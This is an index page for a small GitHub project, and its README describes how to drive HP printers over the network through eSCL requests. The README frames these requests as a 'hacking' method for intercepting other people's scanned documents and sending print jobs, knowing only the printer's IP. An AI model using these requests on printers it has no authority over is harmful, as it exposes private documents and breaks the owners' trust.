Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/an0ncer/hp-scaner-server
Scan documents from an HP printer with wifi access
https://github.com/an0ncer/hp-scaner-server
hp javascript printer
Last synced: 29 days ago
JSON representation
Scan documents from an HP printer with wifi access
- Host: GitHub
- URL: https://github.com/an0ncer/hp-scaner-server
- Owner: AN0NCER
- Created: 2023-01-12T13:05:18.000Z (almost 2 years ago)
- Default Branch: main
- Last Pushed: 2023-01-20T23:23:49.000Z (almost 2 years ago)
- Last Synced: 2024-05-21T06:01:46.114Z (8 months ago)
- Topics: hp, javascript, printer
- Language: JavaScript
- Homepage:
- Size: 12.7 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# HP printer | Scanner | Hacking
HP printers have a vulnerability with online requests. With these requests, you can intercept the data of scanned documents. Make a scan task. I can also send any documents for printing.To receive data from the printer, you only need to know its ip, which is very easy to find.
Basic requests:
`http://192.168.31.187/eSCL/ScannerCapabilities`
`http://192.168.31.187/DevMgmt/ProductStatusDyn.xml`
`http://192.168.31.187/eSCL/ScannerStatus`
`http://192.168.31.187/eSCL/ScanJobs` - POST
```xml
2.63
3507
escl:ThreeHundredthsOfInches
2481
0
0
image/jpeg
Platen
200
200
RGB24
false```
`http://192.168.31.187/eSCL/ScanJobs/f2nt7zvf-k59q-yk0h-1007-1odl0dbx/NextDocument`